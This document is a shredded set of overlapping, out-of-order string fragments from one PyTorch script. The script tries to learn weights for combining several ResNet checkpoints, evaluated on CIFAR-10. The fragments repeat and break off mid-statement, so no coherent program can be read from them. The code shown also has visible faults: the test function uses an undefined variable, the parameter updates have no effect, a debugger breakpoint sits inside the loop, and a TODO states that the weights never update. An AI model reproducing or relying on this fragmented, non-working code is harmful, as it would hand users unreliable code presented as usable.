"= SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914,",
"1, 'Alphas should sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas",
"# logging.info('=> Accuracy improved from {} --> {} at iteration {} K'.format(best_acc, test_acc,",
"# 'acc' : test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir,",
"as transforms from models import * parser = argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name",
"= criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace()",
"else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params",
"# save loss over the whole test set at TB test_acc = 100.",
"Main optimization loop ## TODO: alphas are not updating -- solve this issue",
"K'.format(best_acc, test_acc, int(i / 1000) )) # state = { # 'net' :",
"0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader =",
"## Init alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1",
"loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer =",
": test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int(",
"optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(),",
"whole test set at TB test_acc = 100. * correct_samples / total_samples total_test_loss",
"optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas",
") loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else",
"= argparse.ArgumentParser() parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to",
"args.iter_save == 0: # test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=>",
"testloader, criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f} -- ACC: {}",
"optimizer.step() # scheduler.step() # train_loss += loss.item() # _, predicted = outputs.max(1) #",
"23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), }",
"optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer",
"correct_samples / total_samples # # log metrics to TB every 100 iterations #",
"for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device) # [bs, 3, 32,",
"= model.to(device) model.train() ## Init alphas and optimizer alphas = torch.rand(num_models) / num_models",
"print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr,",
"net.state_dict(), # 'acc' : test_acc, # 'iter' : i, # } # torch.save(state,",
"default=100, type=int, help='number of total iterations to run') args = parser.parse_args() # use",
"test_loss = 0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs,",
"test_loss, test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with Loss:",
"# 11m params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m",
"testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0, 0 with",
"parser.parse_args() # use this to init weight as required torch.manual_seed(0) device = torch.device(\"cuda\"",
"32, 32] targets = targets.to(device) # [bs] outputs = model(inputs) loss = criterion(outputs,",
"criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ###",
"loss.item() # _, predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples +=",
"transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False,",
"sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader) ## Create",
"= test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f} --",
"import torch.nn as nn import torch.optim as optim import torch.nn.functional as F import",
"# print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9,",
") # state = { # 'net' : net.state_dict(), # 'acc' : test_acc,",
"1000) )) # state = { # 'net' : net.state_dict(), # 'acc' :",
"= criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0)",
"logging.info('=> Saving model with Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss,",
"help='number of total iterations to run') args = parser.parse_args() # use this to",
"# logging.info('=> Saving model with Loss: {:.5f} -- ACC: {} at iteration {}",
"# 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i /",
"correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples / total_samples # # log metrics",
"= False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader =",
"if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params =",
"cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms from models",
"alphas[ii] ) else: for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params =",
"init weight as required torch.manual_seed(0) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes",
"of total iterations to run') args = parser.parse_args() # use this to init",
"+= loss.item() # _, predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples",
"= len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model] model =",
") batch = next(loader) inputs, targets = batch inputs = inputs.to(device) targets =",
"i / 1000)) ) # state = { # 'net' : net.state_dict(), #",
"42m 'resnet152': ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18':",
"= 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to 1'",
"model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using",
"0.999)) ### Main optimization loop ## TODO: alphas are not updating -- solve",
"Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994,",
"i) # writer_train.add_scalar('train_loss', train_loss, i) # # test model and save it every",
"'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18'",
"alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to",
"import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as",
"'truck') model_dict = { 'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(),",
"type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use",
"'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion,",
"F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms",
"optimization loop ## TODO: alphas are not updating -- solve this issue for",
"# [bs] # outputs = net(inputs) # loss = criterion(outputs, targets) # optimizer.zero_grad()",
"# inputs, targets = batch # inputs = inputs.to(device) # [bs, 3, 32,",
"criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx",
"print(\"TRAINING IS DONE!\") # break # train_loss = 0 # total_samples, correct_samples =",
"best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0, 0 with torch.no_grad(): for",
"idx in pbar: # i = idx + args.start_iter # if i >",
"= criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss",
"import os, pdb, logging, argparse import torch import torch.nn as nn import torch.optim",
"checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console",
"32] # targets = targets.to(device) # [bs] # outputs = net(inputs) # loss",
": VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2',",
"1 - sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters",
"IS DONE!\") # break # train_loss = 0 # total_samples, correct_samples = 0,",
"'net' : net.state_dict(), # 'acc' : test_acc, # 'iter' : i, # }",
"writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(),",
"writer_train.add_scalar('train_loss', train_loss, i) # # test model and save it every 5000 iterations",
"torch.optim as optim import torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard",
"['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model,",
"model with Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc, int(",
"/ (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir):",
"correct_samples / total_samples total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def main():",
"batch_size = len(testset), batch_size = 1000, shuffle = False, # sampler = data_sampler(testset,",
"it in range(num_iters): # load model weights and multiply with alphas for ii,",
"'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples =",
"loss = criterion(outputs, targets) test_loss += loss.item() _, predicted = outputs.max(1) total_samples +=",
"model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0:",
"# if test_acc > best_acc: # logging.info('=> Accuracy improved from {} --> {}",
"and save it every 5000 iterations # if i % args.iter_save == 0:",
"if test_acc > best_acc: # logging.info('=> Accuracy improved from {} --> {} at",
"args = parser.parse_args() # use this to init weight as required torch.manual_seed(0) device",
"logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=> Preparing data..') transform_test",
"# loss = criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step()",
"total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the whole test",
"test_loss, i) # if test_acc > best_acc: # logging.info('=> Accuracy improved from {}",
"optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item() # _,",
"{} at iteration {} K'.format(test_loss, test_acc, int( i / 1000)) ) # state",
"# sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader = iter(testloader) ##",
"logging, argparse import torch import torch.nn as nn import torch.optim as optim import",
"else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship',",
"= optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ## TODO: alphas are",
"scheduler.step() # train_loss += loss.item() # _, predicted = outputs.max(1) # total_samples +=",
"11m params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101':",
"correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs",
"model = model.to(device) model.train() ## Init alphas and optimizer alphas = torch.rand(num_models) /",
"shuffle = False, # sampler = data_sampler(testset, shuffle=False), num_workers = 4, ) loader",
"# net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc",
"sum(alphas[:-1]) assert sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters = args.iter",
"# [bs, 3, 32, 32] # targets = targets.to(device) # [bs] # outputs",
"ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19' :",
"= next(loader) # inputs, targets = batch # inputs = inputs.to(device) # [bs,",
"ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter(",
"= 0 # total_samples, correct_samples = 0, 0 # batch = next(loader) #",
"= torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1]) assert sum(alphas).item() == 1,",
"model.train() ## Init alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] =",
"console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim')) ## Data print('=>",
"## TODO: alphas are not updating -- solve this issue for it in",
"test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0, 0",
"{ 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = {",
"total_test_loss = test_loss / (batch_idx+1) return total_test_loss, test_acc def main(): checkpoint_dir = 'results_ensembles/{}'.format(args.name)",
"loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0])",
"i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if __name__",
"predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over",
"criterion(outputs, targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss +=",
"if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console)",
"= next(loader) inputs, targets = batch inputs = inputs.to(device) targets = targets.to(device) outputs",
"= iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models",
"= correct_samples / total_samples # # log metrics to TB every 100 iterations",
"+ args.start_iter # if i > args.iter: # print(\"TRAINING IS DONE!\") # break",
"i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) #",
"help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate')",
"parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run') args = parser.parse_args() #",
"# train_loss = 0 # total_samples, correct_samples = 0, 0 # batch =",
"at iteration {} K'.format(best_acc, test_acc, int(i / 1000) )) # state = {",
"chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict",
"solve this issue for it in range(num_iters): # load model weights and multiply",
"torch.nn.functional as F import torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision",
"= 'results_ensembles/{}'.format(args.name) if not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console =",
"tqdm import os, pdb, logging, argparse import torch import torch.nn as nn import",
"= len(testset), batch_size = 1000, shuffle = False, # sampler = data_sampler(testset, shuffle=False),",
"= 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples",
"# total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc = correct_samples /",
"# i = idx + args.start_iter # if i > args.iter: # print(\"TRAINING",
": i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) )))",
"inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device) # [bs] outputs =",
"not os.path.exists(checkpoint_dir): os.makedirs(checkpoint_dir) ## Logging logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO)",
"import SummaryWriter import torchvision import torchvision.transforms as transforms from models import * parser",
"loop ## TODO: alphas are not updating -- solve this issue for it",
"params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(),",
"type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning",
"# for idx in pbar: # i = idx + args.start_iter # if",
"1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas],",
"checkpoint[name] ) batch = next(loader) inputs, targets = batch inputs = inputs.to(device) targets",
"in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params * alphas[ii] ) else:",
"# train_acc = correct_samples / total_samples # # log metrics to TB every",
"it every 5000 iterations # if i % args.iter_save == 0: # test_loss,",
"1000)) ) # state = { # 'net' : net.state_dict(), # 'acc' :",
"# criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for",
"loader = iter(testloader) ## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model]",
"augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations",
"= torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000, shuffle = False,",
"0 # total_samples, correct_samples = 0, 0 # batch = next(loader) # inputs,",
"model weights and multiply with alphas for ii, model_name in enumerate(model_names): model_path =",
"total iterations to run') args = parser.parse_args() # use this to init weight",
"net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc >",
"# test model and save it every 5000 iterations # if i %",
"# if i > args.iter: # print(\"TRAINING IS DONE!\") # break # train_loss",
"i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss,",
": ResNet18(), # 11m params 'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(),",
"transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True,",
"[bs, 3, 32, 32] # targets = targets.to(device) # [bs] # outputs =",
"'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(),",
"model and save it every 5000 iterations # if i % args.iter_save ==",
"0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader): inputs = inputs.to(device)",
"= inputs.to(device) # [bs, 3, 32, 32] targets = targets.to(device) # [bs] outputs",
"'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50':",
"args.start_iter # if i > args.iter: # print(\"TRAINING IS DONE!\") # break #",
"print(list(model.parameters())[0][0]) optimizer.zero_grad() loss.backward() optimizer.step() print(alphas) # print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() #",
"'Alphas should sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas =",
"logging.basicConfig(filename=os.path.join(checkpoint_dir, 'optim.log'), level=logging.INFO) console = logging.StreamHandler() logging.getLogger().addHandler(console) console.setLevel(logging.INFO) logging.info(args) writer_test = SummaryWriter(log_dir=os.path.join(checkpoint_dir, 'optim'))",
"Accuracy improved from {} --> {} at iteration {} K'.format(best_acc, test_acc, int(i /",
"-- solve this issue for it in range(num_iters): # load model weights and",
"test_acc = test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f}",
"pdb, logging, argparse import torch import torch.nn as nn import torch.optim as optim",
"= targets.to(device) # [bs] # outputs = net(inputs) # loss = criterion(outputs, targets)",
"from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms from models import",
"# batch_size = len(testset), batch_size = 1000, shuffle = False, # sampler =",
"targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the whole test set at",
"loss over the whole test set at TB test_acc = 100. * correct_samples",
"checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name, model_params in model.named_parameters(): if not",
"alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets = batch inputs =",
"'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' : ResNet18(), #",
"= { # 'net' : net.state_dict(), # 'acc' : test_acc, # 'iter' :",
"parser.add_argument('--name', default='', type=str, help='name of experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm',",
"type=int, help='number of total iterations to run') args = parser.parse_args() # use this",
"iterations # if i % 100 == 0: # writer_train.add_scalar('train_acc', train_acc, i) #",
"model_dict = { 'resnet18' : ResNet18(), # 11m params 'resnet34' : ResNet34(), #",
"inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) #",
"train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr', default=1e-2, type=float, help='learning rate') parser.add_argument('--iter', default=100,",
"correct_samples = 0, 0 # batch = next(loader) # inputs, targets = batch",
"testset, # batch_size = len(testset), batch_size = 1000, shuffle = False, # sampler",
"model_params in model.named_parameters(): if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] *",
"for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net']",
"i % args.iter_save == 0: # test_loss, test_acc = test(net, testloader, criterion, best_acc)",
"loss.item() _, predicted = outputs.max(1) total_samples += targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save",
"= torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch = next(loader) inputs, targets",
"TODO: alphas are not updating -- solve this issue for it in range(num_iters):",
"save it every 5000 iterations # if i % args.iter_save == 0: #",
"test(net, testloader, criterion, best_acc) # logging.info('=> Saving model with Loss: {:.5f} -- ACC:",
"alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1] = 1 - sum(alphas[:-1])",
"are not updating -- solve this issue for it in range(num_iters): # load",
"{ 'resnet18': ['R18_augm1', 'R18_augm2', 'R18_augm3'], 'resnet50': ['R50_augm1', 'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth'",
"total_samples, correct_samples = 0, 0 with torch.no_grad(): for batch_idx, (inputs, targets) in enumerate(testloader):",
"chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model = model_dict[args.model]",
"targets = batch inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss",
"# [bs, 3, 32, 32] targets = targets.to(device) # [bs] outputs = model(inputs)",
"= torch.nn.Parameter(alphas) optimizer = optim.Adam([alphas], lr=args.lr, betas=(0.9, 0.999)) ### Main optimization loop ##",
"model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint) for name,",
"in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint = torch.load(model_path)['net'] if ii==0: model.load_state_dict(checkpoint)",
"# # test model and save it every 5000 iterations # if i",
"predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() # train_acc",
"1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) #",
"# loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item() # _, predicted",
": ResNet50(), # 23m 'resnet101': ResNet101(), # 42m 'resnet152': ResNet152(), # 58m 'vgg19'",
"{} K'.format(best_acc, test_acc, int(i / 1000) )) # state = { # 'net'",
"# writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i) # if test_acc > best_acc:",
"Loss: {:.5f} -- ACC: {} at iteration {} K'.format(test_loss, test_acc, int( i /",
"_, predicted = outputs.max(1) # total_samples += targets.size(0) # correct_samples += predicted.eq(targets).sum().item() #",
"if i % args.iter_save == 0: # test_loss, test_acc = test(net, testloader, criterion,",
"model.to(device) model.train() ## Init alphas and optimizer alphas = torch.rand(num_models) / num_models alphas[-1]",
"optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4) # for idx in pbar: # i",
"'R18_2', 'R18_3'], 'resnet50': ['R50_1', 'R50_2', 'R50_3'], } chpt_augm_dict = { 'resnet18': ['R18_augm1', 'R18_augm2',",
"= inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas)",
"with alphas for ii, model_name in enumerate(model_names): model_path = os.path.join('results', model_name, chpt_name) checkpoint",
"targets = batch # inputs = inputs.to(device) # [bs, 3, 32, 32] #",
"== 0: # writer_train.add_scalar('train_acc', train_acc, i) # writer_train.add_scalar('train_loss', train_loss, i) # # test",
"os.path.join(checkpoint_dir, 'net_{}.pth'.format( int( i / 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i)",
"} # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if __name__ == '__main__':",
"rate') parser.add_argument('--iter', default=100, type=int, help='number of total iterations to run') args = parser.parse_args()",
"torch.backends.cudnn as cudnn from torch.utils.tensorboard import SummaryWriter import torchvision import torchvision.transforms as transforms",
"= batch inputs = inputs.to(device) targets = targets.to(device) outputs = model(inputs) loss =",
"'R50_augm2', 'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss",
"## Data print('=> Preparing data..') transform_test = transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023,",
"set at TB test_acc = 100. * correct_samples / total_samples total_test_loss = test_loss",
"targets = targets.to(device) outputs = model(inputs) loss = criterion(outputs, targets) print(alphas) # print(list(model.parameters())[0][0])",
"0 # batch = next(loader) # inputs, targets = batch # inputs =",
"0.4822, 0.4465), (0.2023, 0.1994, 0.2010)), ]) testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test) testloader",
"every 5000 iterations # if i % args.iter_save == 0: # test_loss, test_acc",
"/ 1000) ))) # net.train() # writer_test.add_scalar('test_acc', test_acc, i) # writer_test.add_scalar('test_loss', test_loss, i)",
"range(num_iters): # load model weights and multiply with alphas for ii, model_name in",
"torch.utils.data.DataLoader( testset, # batch_size = len(testset), batch_size = 1000, shuffle = False, #",
"+= targets.size(0) correct_samples += predicted.eq(targets).sum().item() # save loss over the whole test set",
"model_params = torch.nn.Parameter( model_params * alphas[ii] ) else: for name, model_params in model.named_parameters():",
"targets) # optimizer.zero_grad() # loss.backward() # optimizer.step() # scheduler.step() # train_loss += loss.item()",
"# print(\"TRAINING IS DONE!\") # break # train_loss = 0 # total_samples, correct_samples",
"experiment') parser.add_argument('--model', default='resnet18', type=str, help='model to train') parser.add_argument('--use_augm', action='store_true', help='use data augmentations?') parser.add_argument('--lr',",
"ResNet152(), # 58m 'vgg19' : VGG('VGG19'), } chpt_vanilla_dict = { 'resnet18': ['R18_1', 'R18_2',",
"criterion, best_acc): net.eval() test_loss = 0 total_samples, correct_samples = 0, 0 with torch.no_grad():",
"if not name.endswith('num_batches_tracked'): model_params = torch.nn.Parameter( model_params + alphas[ii] * checkpoint[name] ) batch",
": net.state_dict(), # 'acc' : test_acc, # 'iter' : i, # } #",
"[bs, 3, 32, 32] targets = targets.to(device) # [bs] outputs = model(inputs) loss",
"should sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas)",
"print(list(model.parameters())[0][0]) pdb.set_trace() # criterion = nn.CrossEntropyLoss() # optimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=1e-4)",
"'resnet34' : ResNet34(), # 21m 'resnet50' : ResNet50(), # 23m 'resnet101': ResNet101(), #",
"else chpt_vanilla_dict[args.model] num_models = len(model_names) print('=> Using {} models {}'.format(num_models, args.model)) model =",
"sum to 1' num_iters = args.iter criterion = nn.CrossEntropyLoss() alphas = torch.nn.Parameter(alphas) optimizer",
"test_acc, int(i / 1000) )) # state = { # 'net' : net.state_dict(),",
"sum(alphas).item() == 1, 'Alphas should sum to 1' num_iters = args.iter criterion =",
"'acc' : test_acc, # 'iter' : i, # } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth'))",
"# } # torch.save(state, os.path.join(checkpoint_dir, 'net_best.pth')) # best_acc = test_acc if __name__ ==",
"## Create model model_names = chpt_augm_dict[args.model] if args.use_augm else chpt_vanilla_dict[args.model] num_models = len(model_names)",
"= torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") classes = ('plane', 'car', 'bird', 'cat', 'deer',",
"'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck') model_dict = { 'resnet18' :",
"'R50_augm3'], } chpt_name = 'net_80.pth' def test(model, testloader, criterion, best_acc): net.eval() test_loss =",
"= inputs.to(device) # [bs, 3, 32, 32] # targets = targets.to(device) # [bs]",
